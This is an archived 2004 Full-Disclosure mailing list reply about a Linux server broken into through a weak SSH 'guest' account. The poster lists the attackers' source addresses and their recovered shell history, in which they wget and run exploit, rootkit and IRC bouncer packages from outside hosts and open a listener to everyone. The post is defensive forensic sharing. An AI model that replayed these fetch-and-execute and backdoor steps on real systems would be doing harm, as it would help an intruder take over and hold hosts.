Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: !SPAM! Automated ssh scanning

From: Richard Verwayen <holle () ackw de>
Date: Thu, 26 Aug 2004 19:44:46 +0200
On Thu, 2004-08-26 at 18:36, Tremaine wrote:

On Thu, 26 Aug 2004 09:43:13 -0500 (CDT), Ron DuFresne
<dufresne () winternet com> wrote:

On Thu, 26 Aug 2004, Richard Verwayen wrote:


On Thu, 2004-08-26 at 15:12, Todd Towles wrote:

 The kernel could be save. But with weak passwords, you are toast. Any
automated tool would test guest/guest.


Hello Todd!

You are right about the passwords, but guest is only a unprivileged
account as you may have on many prodruction machines. But they managed
to become root on this machine due to a kernel(?) exploit!
Should I then consider any woody system to be insecure to let people
work at?



If your uasers are not trustable, then they should not have access to
local systems of yours.  Once a person has a shell, then they are 95% to
root.

Thanks,

Ron DuFresne



Fair point... but it would still be nice to determine precisely how
they are getting root access so preventative measures can be taken and
the hole plugged.

Some more infos maybe useful:


Hosts from which my "guest" they logged in
     213.154.103.49
     213.154.103.40
     213.154.103.49
     210.177.241.201
     66.250.216.109
     66.250.216.109
     210.52.66.56
     62.108.109.163
     62.108.109.163
     213-35-199-254-dsl.mus.estpak.ee
     0x50a349b6.unknown.tele.dk


Way the attacker got r00t (as listed in guest's history)

PATH=:PATH
xs
uname -a
exit
PATH=:PATH
xs
logout
exit
w
cat /etc/hosts
cd /tmp
wget www.bo2k-rulez.net/a
chmod +x a
./a
wget www.bo2k-rulez.net/psybnc.tgz
tar zfvx psybnc.tgz
cd psybnc
make
mv psybnc xs
sh
uname -a
ls
pico psybnc.conf
rm -rf psybnc.conf
echo "PSYBNC.SYSTEM.PORT1=21221" >> psybnc.conf
echo "PSYBNC.SYSTEM.HOST1=*" >> psybnc.conf
echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> psybnc.conf
killall -9 xs
sh
exit
logout
cd /var/tmp/
 wget sky.prohosting.com/awxro/linux/xpl.tar.gz
tar xzvf xpl.tar.gz
xpl/ptr1
wget www.bo2k-rulez.net/a
./a
chmod =x a
./a
rm -rf a
exit
exit
passwd
passwd
ls -al
hostname
w
cat /etc/hosts
ifconfig
/sbin/ifconfig
cd /tmp
mkdir ...
wget www.corbeanu.as.ro/t.gz
tar zxvf t.gz
./t
mv fastmech httpd
export PAT="."
export PATH="."
httpd
httpd
wget www.corbeanu.as.ro/god.tgz
wget www.geocities.com/sniffhax/god.tgz
wget roamy.com/god.tgz
wget roarmy.com/god.tgz
tar zxvf god.tgz
cd god
./install
wget www.corbeanu.as.ro/rkid.tgz
tar zxvf rkid.tgz
cd rkid
./setup stelian 6006
ls
ls -a
wget www.generatiapro.go.ro/fast.tgz
tar zxvf fast.tgz
cd fastmech 
bash



-- 
Richard Verwayen <holle () ackw de>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: